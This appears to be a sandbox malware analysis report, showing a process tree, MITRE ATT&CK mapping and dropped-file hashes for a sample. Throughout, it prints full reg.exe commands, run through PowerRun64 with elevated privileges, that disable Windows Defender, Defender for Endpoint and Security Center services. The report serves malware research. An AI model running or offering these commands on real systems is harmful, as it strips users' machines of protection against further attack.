    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2516
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2800
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:904
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2272
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1428
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:664
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:900
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:380
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1544
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1660
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2568
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:552
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:996
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:2928
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  PID:2240
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2748
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1320
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2708
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2592
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:320
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2988
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1516
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2868
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1816
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1424
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2028
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2604
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1800
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:2576
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1928
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2208
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1608
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2360
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2144
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3032
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:1484
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2152
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2112
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies security service
        
        PID:2628
- C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3040
- - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
    "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2940
  - - C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_63_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2756
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Modifies Security services
        
        PID:1100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Get-MpPreference"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2904

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241204140031.log C:\Windows\Logs\CBS\CbsPersist_20241204140031.cab
1⤵
- Drops file in Windows directory
PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\autD3D3.tmp

Filesize
25KB

MD5
436c1bb98deeccecb73fad945f1dd3dc

SHA1
774313ba911945589971bbc73498d81f060dabe6

SHA256
05eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51

SHA512
66ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e924ce41f34ad7d7aeb4685813b3d862

SHA1
0d4741e0b312e4686f525fabeca9fbb1b750d641

SHA256
91707d4074ad8da6ee76ac4e4446fc2782deb68271ebb54a7946117ad3517c72

SHA512
28aff296403ca4612925ffc67abca6b750f8e46c3dd49ccac9ded488c17171f9a4bc8a9aaef6e4183423f86f4e442cebecc1ecb2e29f89a4a31d6c7c2b81854f

Download Submit
C:\Windows\Temp\qtpfcgy

Filesize
81KB

MD5
940b1915cadee0e2b33d80799816f6c7

SHA1
2c10e4fec3e8c054055d1ed78757117575f273f2

SHA256
81e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c

SHA512
cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5

Download Submit
memory/564-333-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/564-326-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/852-340-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/852-341-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download